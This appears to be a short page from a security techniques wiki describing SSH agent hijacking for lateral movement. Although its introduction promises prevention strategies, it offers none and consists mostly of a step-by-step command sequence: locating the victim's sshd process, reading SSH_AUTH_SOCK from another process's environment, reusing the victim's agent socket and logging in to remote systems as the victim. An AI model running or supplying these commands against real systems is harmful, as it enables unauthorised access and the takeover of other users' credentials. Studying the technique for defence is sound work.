SSH Hijacking

Dive deep into our comprehensive article that takes you through the intricacies of SSH Hijacking. Get the best prevention strategies and solutions for this cyber threat.

# Attacker finds the SSHd process of the victim
ps uax|grep sshd
 
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ
 
# Attacker hijack's victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
 
# Attacker can login to remote systems as the victim
ssh remote_system -l vicitm

SSH Hijacking for lateral movementxorl %eax, %eax

PreviousSSH User Code Execution NextSteal SSH credentials

Last updated 6 days ago